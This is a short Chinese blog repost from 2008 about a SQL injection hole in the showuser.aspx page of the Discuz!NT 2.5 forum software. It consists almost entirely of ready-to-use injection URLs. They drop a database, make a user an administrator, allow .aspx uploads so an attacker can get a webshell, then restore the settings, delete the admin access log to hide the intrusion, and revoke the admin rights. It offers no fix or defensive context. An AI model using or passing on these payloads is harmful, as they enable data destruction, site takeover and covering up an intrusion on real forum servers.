[导入]Discuz!NT 2.5 showuser.aspx注入漏洞

Spirit's blog ( http://www.fuckhacker.net/ ) :

http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传
得到SHELL后...
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG
http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员

文章来源:http://www.fuckhacker.net/?action=show&id=257

posted @ 2008-11-30 16:38 Vocoo 阅读(194) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

[导入]Discuz!NT 2.5 showuser.aspx注入漏洞

公告